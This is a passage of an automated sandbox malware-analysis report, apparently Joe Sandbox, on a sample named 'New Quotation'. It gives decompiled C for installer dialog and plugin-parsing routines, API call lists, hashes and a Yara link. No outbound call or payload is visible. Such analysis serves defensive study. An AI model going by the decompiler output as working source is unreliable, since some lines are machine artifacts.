							__eflags =  *0x434f8c - _t156;
							if( *0x434f8c == _t156) {
								_t119 =  *0x42c240; // 0x6211cc
								E0040559F( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E00404472(_t171);
							goto L25;
						}
						 *0x42ba38 = 2;
						E00404472(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404500(_a8, _a12, _a16);
						}
						ShowWindow( *0x433ed0, _t156);
						ShowWindow(_t169, 8);
						E004044CE(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x434f10;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x433ed0 = GetDlgItem(_a4, 0x403);
				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x433ee4 = _t134;
				_v8 = _t134;
				E004044CE( *0x433ed0);
				 *0x433ed4 = E00404E27(4);
				 *0x433eec = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404499(_a4);
				if(( *0x434f18 & 0x00000003) != 0) {
					ShowWindow( *0x433ed0, _t156);
					if(( *0x434f18 & 0x00000002) != 0) {
						 *0x433ed0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004044CE( *0x433ec8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x434f18 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}





































                                                                                                                                                                                          0x004056e6
                                                                                                                                                                                          0x004056ec
                                                                                                                                                                                          0x004056f6
                                                                                                                                                                                          0x004056f9
                                                                                                                                                                                          0x00405888
                                                                                                                                                                                          0x0040588f
                                                                                                                                                                                          0x004058ac
                                                                                                                                                                                          0x004058b3
                                                                                                                                                                                          0x004058b3
                                                                                                                                                                                          0x004058b9
                                                                                                                                                                                          0x004058c6
                                                                                                                                                                                          0x004058e4
                                                                                                                                                                                          0x004058e6
                                                                                                                                                                                          0x004058e7
                                                                                                                                                                                          0x004058ee
                                                                                                                                                                                          0x00405944
                                                                                                                                                                                          0x00405944
                                                                                                                                                                                          0x00405948
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040594a
                                                                                                                                                                                          0x0040594d
                                                                                                                                                                                          0x00405950
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040595a
                                                                                                                                                                                          0x00405960
                                                                                                                                                                                          0x00405962
                                                                                                                                                                                          0x00405965
                                                                                                                                                                                          0x00405a67
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405a67
                                                                                                                                                                                          0x00405974
                                                                                                                                                                                          0x0040597f
                                                                                                                                                                                          0x00405988
                                                                                                                                                                                          0x0040598f
                                                                                                                                                                                          0x00405993
                                                                                                                                                                                          0x00405996
                                                                                                                                                                                          0x0040599f
                                                                                                                                                                                          0x004059a5
                                                                                                                                                                                          0x004059a8
                                                                                                                                                                                          0x004059a8
                                                                                                                                                                                          0x004059b8
                                                                                                                                                                                          0x004059be
                                                                                                                                                                                          0x004059c0
                                                                                                                                                                                          0x004059c9
                                                                                                                                                                                          0x004059cc
                                                                                                                                                                                          0x004059d3
                                                                                                                                                                                          0x004059da
                                                                                                                                                                                          0x004059e2
                                                                                                                                                                                          0x004059e2
                                                                                                                                                                                          0x004059f0
                                                                                                                                                                                          0x004059f6
                                                                                                                                                                                          0x004059f9
                                                                                                                                                                                          0x004059f9
                                                                                                                                                                                          0x00405a00
                                                                                                                                                                                          0x00405a06
                                                                                                                                                                                          0x00405a12
                                                                                                                                                                                          0x00405a19
                                                                                                                                                                                          0x00405a22
                                                                                                                                                                                          0x00405a24
                                                                                                                                                                                          0x00405a27
                                                                                                                                                                                          0x00405a36
                                                                                                                                                                                          0x00405a39
                                                                                                                                                                                          0x00405a3f
                                                                                                                                                                                          0x00405a40
                                                                                                                                                                                          0x00405a46
                                                                                                                                                                                          0x00405a47
                                                                                                                                                                                          0x00405a48
                                                                                                                                                                                          0x00405a48
                                                                                                                                                                                          0x00405a50
                                                                                                                                                                                          0x00405a5b
                                                                                                                                                                                          0x00405a61
                                                                                                                                                                                          0x00405a61
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004059c0
                                                                                                                                                                                          0x004058f0
                                                                                                                                                                                          0x004058f6
                                                                                                                                                                                          0x00405926
                                                                                                                                                                                          0x00405928
                                                                                                                                                                                          0x0040592e
                                                                                                                                                                                          0x00405930
                                                                                                                                                                                          0x00405939
                                                                                                                                                                                          0x00405939
                                                                                                                                                                                          0x0040593f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040593f
                                                                                                                                                                                          0x004058fa
                                                                                                                                                                                          0x00405904
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004058c8
                                                                                                                                                                                          0x004058c8
                                                                                                                                                                                          0x004058ce
                                                                                                                                                                                          0x00405909
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405912
                                                                                                                                                                                          0x004058d7
                                                                                                                                                                                          0x004058dc
                                                                                                                                                                                          0x004058df
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004058df
                                                                                                                                                                                          0x004058c6
                                                                                                                                                                                          0x004056ff
                                                                                                                                                                                          0x00405703
                                                                                                                                                                                          0x0040570b
                                                                                                                                                                                          0x0040570f
                                                                                                                                                                                          0x00405712
                                                                                                                                                                                          0x00405715
                                                                                                                                                                                          0x00405718
                                                                                                                                                                                          0x0040571b
                                                                                                                                                                                          0x0040571c
                                                                                                                                                                                          0x0040571d
                                                                                                                                                                                          0x00405736
                                                                                                                                                                                          0x00405739
                                                                                                                                                                                          0x00405743
                                                                                                                                                                                          0x00405752
                                                                                                                                                                                          0x0040575a
                                                                                                                                                                                          0x00405762
                                                                                                                                                                                          0x00405767
                                                                                                                                                                                          0x0040576a
                                                                                                                                                                                          0x00405776
                                                                                                                                                                                          0x0040577f
                                                                                                                                                                                          0x00405788
                                                                                                                                                                                          0x004057aa
                                                                                                                                                                                          0x004057b0
                                                                                                                                                                                          0x004057c1
                                                                                                                                                                                          0x004057c6
                                                                                                                                                                                          0x004057d4
                                                                                                                                                                                          0x004057e2
                                                                                                                                                                                          0x004057e2
                                                                                                                                                                                          0x004057e7
                                                                                                                                                                                          0x004057f5
                                                                                                                                                                                          0x004057f5
                                                                                                                                                                                          0x004057fa
                                                                                                                                                                                          0x004057fd
                                                                                                                                                                                          0x00405802
                                                                                                                                                                                          0x0040580e
                                                                                                                                                                                          0x00405817
                                                                                                                                                                                          0x00405824
                                                                                                                                                                                          0x00405833
                                                                                                                                                                                          0x00405826
                                                                                                                                                                                          0x0040582b
                                                                                                                                                                                          0x0040582b
                                                                                                                                                                                          0x0040583f
                                                                                                                                                                                          0x0040583f
                                                                                                                                                                                          0x00405853
                                                                                                                                                                                          0x0040585c
                                                                                                                                                                                          0x00405865
                                                                                                                                                                                          0x00405875
                                                                                                                                                                                          0x00405881
                                                                                                                                                                                          0x00405881
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 0040573C
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040574B
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00405788
                                                                                                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 0040578F
                                                                                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                                                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                                                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                                                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                                                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040584C
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 0040575A
                                                                                                                                                                                            • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040589E
                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 004058B3
                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004058D7
                                                                                                                                                                                          • ShowWindow.USER32(00010448,00000008), ref: 004058DC
                                                                                                                                                                                          • ShowWindow.USER32(00000008), ref: 00405926
                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 0040596B
                                                                                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040599F
                                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405A00
                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00405A06
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405A1C
                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 00405A61
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                          • String ID: {
                                                                                                                                                                                          • API String ID: 590372296-366298937
                                                                                                                                                                                          • Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                                                                                                                                          • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                                                                                                                                                                          • Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                                                                                                                                          • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 71091BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                          			E71091BFF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				WCHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				WCHAR* _t208;
				signed int _t211;
				void* _t213;
				void* _t215;
				WCHAR* _t217;
				void* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t227;
				struct HINSTANCE__* _t229;
				signed short _t231;
				struct HINSTANCE__* _t234;
				struct HINSTANCE__* _t236;
				void* _t237;
				intOrPtr* _t238;
				void* _t249;
				signed char _t250;
				signed int _t251;
				void* _t255;
				struct HINSTANCE__* _t257;
				void* _t258;
				signed int _t260;
				signed int _t261;
				signed short* _t264;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				void* _t277;
				void* _t281;
				struct HINSTANCE__* _t283;
				signed int _t286;
				void _t287;
				signed int _t288;
				signed int _t300;
				signed int _t301;
				signed short _t304;
				void* _t305;
				signed int _t309;
				signed int _t312;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed short* _t321;
				WCHAR* _t322;
				WCHAR* _t324;
				WCHAR* _t325;
				struct HINSTANCE__* _t326;
				void* _t328;
				signed int _t331;
				void* _t332;

				_t283 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t332 = 0;
				_v52 = 0;
				_v44 = 0;
				_t208 = E710912BB();
				_v24 = _t208;
				_v28 = _t208;
				_v48 = E710912BB();
				_t321 = E710912E3();
				_v56 = _t321;
				_v12 = _t321;
				while(1) {
					_t211 = _v32;
					_v60 = _t211;
					if(_t211 != _t283 && _t332 == _t283) {
						break;
					}
					_t286 =  *_t321 & 0x0000ffff;
					_t213 = _t286 - _t283;
					if(_t213 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t215 = _v60 - _t283;
						if(_t215 == 0) {
							__eflags = _t332 - _t283;
							 *_v28 = _t283;
							if(_t332 == _t283) {
								_t255 = GlobalAlloc(0x40, 0x1ca4); // executed
								_t332 = _t255;
								 *(_t332 + 0x1010) = _t283;
								 *(_t332 + 0x1014) = _t283;
							}
							_t287 = _v36;
							_t47 = _t332 + 8; // 0x8
							_t217 = _t47;
							_t48 = _t332 + 0x808; // 0x808
							_t322 = _t48;
							 *_t332 = _t287;
							_t288 = _t287 - _t283;
							__eflags = _t288;
							 *_t217 = _t283;
							 *_t322 = _t283;
							 *(_t332 + 0x1008) = _t283;
							 *(_t332 + 0x100c) = _t283;
							 *(_t332 + 4) = _t283;
							if(_t288 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t328 = 0;
								GlobalFree(_t332);
								_t332 = E710913B1(_v24);
								__eflags = _t332 - _t283;
								if(_t332 == _t283) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t249 =  *(_t332 + 0x1ca0);
									__eflags = _t249 - _t283;
									if(_t249 == _t283) {
										break;
									}
									_t328 = _t332;
									_t332 = _t249;
									__eflags = _t332 - _t283;
									if(_t332 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t328 - _t283;
								if(_t328 != _t283) {
									 *(_t328 + 0x1ca0) = _t283;
								}
								_t250 =  *(_t332 + 0x1010);
								__eflags = _t250 & 0x00000008;
								if((_t250 & 0x00000008) == 0) {
									_t251 = _t250 | 0x00000002;
									__eflags = _t251;
									 *(_t332 + 0x1010) = _t251;
								} else {
									_t332 = E7109162F(_t332);
									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L31:
									lstrcpyW(_t217, _v48);
									L32:
									lstrcpyW(_t322, _v24);
									goto L42;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L32;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t215 == 1) {
								_t257 = _v16;
								if(_v40 == _t283) {
									_t257 = _t257 - 1;
								}
								 *(_t332 + 0x1014) = _t257;
							}
							L42:
							_v12 = _v12 + 2;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t321 = _v12;
								continue;
							}
							break;
						}
					}
					_t258 = _t213 - 0x23;
					if(_t258 == 0) {
						__eflags = _t321 - _v56;
						if(_t321 <= _v56) {
							L17:
							__eflags = _v44 - _t283;
							if(_v44 != _t283) {
								L43:
								_t260 = _v32 - _t283;
								__eflags = _t260;
								if(_t260 == 0) {
									_t261 = _t286;
									while(1) {
										__eflags = _t261 - 0x22;
										if(_t261 != 0x22) {
											break;
										}
										_t321 =  &(_t321[1]);
										__eflags = _v44 - _t283;
										_v12 = _t321;
										if(_v44 == _t283) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[0]);
											 *_v28 =  *_t321;
											L58:
											_t331 =  &(_t321[1]);
											__eflags = _t331;
											_v12 = _t331;
											goto L59;
										}
										_t261 =  *_t321 & 0x0000ffff;
										_v44 = _t283;
									}
									__eflags = _t261 - 0x2a;
									if(_t261 == 0x2a) {
										_v36 = 2;
										L57:
										_t321 = _v12;
										_v28 = _v24;
										_t283 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t261 - 0x2d;
									if(_t261 == 0x2d) {
										L151:
										_t304 =  *_t321;
										__eflags = _t304 - 0x2d;
										if(_t304 != 0x2d) {
											L154:
											_t264 =  &(_t321[1]);
											__eflags =  *_t264 - 0x3a;
											if( *_t264 != 0x3a) {
												goto L162;
											}
											__eflags = _t304 - 0x2d;
											if(_t304 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t264;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 = _t283;
											} else {
												 *_v28 = _t283;
												lstrcpyW(_v48, _v24);
											}
											goto L57;
										}
										_t264 =  &(_t321[1]);
										__eflags =  *_t264 - 0x3e;
										if( *_t264 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t261 - 0x3a;
									if(_t261 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t269 = _t260 - 1;
								__eflags = _t269;
								if(_t269 == 0) {
									L80:
									_t305 = _t286 + 0xffffffde;
									__eflags = _t305 - 0x55;
									if(_t305 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t305 + 0x710923e8) & 0x000000ff) * 4 +  &M7109235C))) {
										case 0:
											__ecx = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												L131:
												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
												if( *((intOrPtr*)(__edi + 2)) != __dx) {
													L136:
													 *__ecx =  *__ecx & 0x00000000;
													__eax = E710912CC(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __ax;
												if(__ax == 0) {
													goto L136;
												}
												__eflags = __ax - __dx;
												if(__ax == __dx) {
													__edi = __edi + 1;
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__ax =  *__edi;
												 *__ecx =  *__edi;
												__ecx = __ecx + 1;
												__ecx = __ecx + 1;
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 2;
											__ebx = E710912BB();
											 &_v12 = E71091B86( &_v12);
											__eax = E71091510(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E71091B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t271 =  *(_t332 + 0x1014);
											__eflags = _t271 - _v16;
											if(_t271 > _v16) {
												_v16 = _t271;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t271 - (_v36 == 3);
											if(_t271 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E71091B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(4);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x7109405c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x1018) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x1028) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E71091B86( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
												_t136 = _v16 + 0x81; // 0x81
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x1030)) = 0;
												 *((intOrPtr*)(__edi + 0x102c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x102c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x1030; // 0x1030
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t272 = _t269 - 1;
								__eflags = _t272;
								if(_t272 == 0) {
									_v16 = _t283;
									goto L80;
								}
								__eflags = _t272 != 1;
								if(_t272 != 1) {
									goto L162;
								}
								__eflags = _t286 - 0x6e;
								if(__eflags > 0) {
									_t309 = _t286 - 0x72;
									__eflags = _t309;
									if(_t309 == 0) {
										_push(4);
										L74:
										_pop(_t274);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t332 + 0x1010;
											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
											__eflags =  *_t96;
										} else {
											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
										}
										_v8 = 1;
										goto L57;
									}
									_t312 = _t309 - 1;
									__eflags = _t312;
									if(_t312 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t312 != 0;
									if(_t312 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t315 = _t286 - 0x21;
								__eflags = _t315;
								if(_t315 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t316 = _t315 - 0x11;
								__eflags = _t316;
								if(_t316 == 0) {
									_t274 = 0x100;
									goto L75;
								}
								_t317 = _t316 - 0x31;
								__eflags = _t317;
								if(_t317 == 0) {
									_t274 = 1;
									goto L75;
								}
								__eflags = _t317 != 0;
								if(_t317 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t283;
								_v36 = _t283;
								goto L20;
							}
						}
						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
						if( *((short*)(_t321 - 2)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t283;
						if(_v32 == _t283) {
							goto L43;
						}
						goto L17;
					}
					_t277 = _t258 - 5;
					if(_t277 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t283;
							_v20 = _t283;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t283;
							goto L20;
						}
					}
					_t281 = _t277 - 1;
					if(_t281 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t283;
							_v20 = _t283;
							goto L20;
						}
					}
					if(_t281 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
					L182:
					return _t332;
				} else {
					_t225 =  *_t332 - 1;
					if(_t225 == 0) {
						_t187 = _t332 + 8; // 0x8
						_t324 = _t187;
						__eflags =  *_t324 - _t283;
						if( *_t324 != _t283) {
							_t226 = GetModuleHandleW(_t324);
							__eflags = _t226 - _t283;
							 *(_t332 + 0x1008) = _t226;
							if(_t226 != _t283) {
								L171:
								_t192 = _t332 + 0x808; // 0x808
								_t325 = _t192;
								_t227 = E710916BD( *(_t332 + 0x1008), _t325);
								__eflags = _t227 - _t283;
								 *(_t332 + 0x100c) = _t227;
								if(_t227 == _t283) {
									__eflags =  *_t325 - 0x23;
									if( *_t325 == 0x23) {
										_t195 = _t332 + 0x80a; // 0x80a
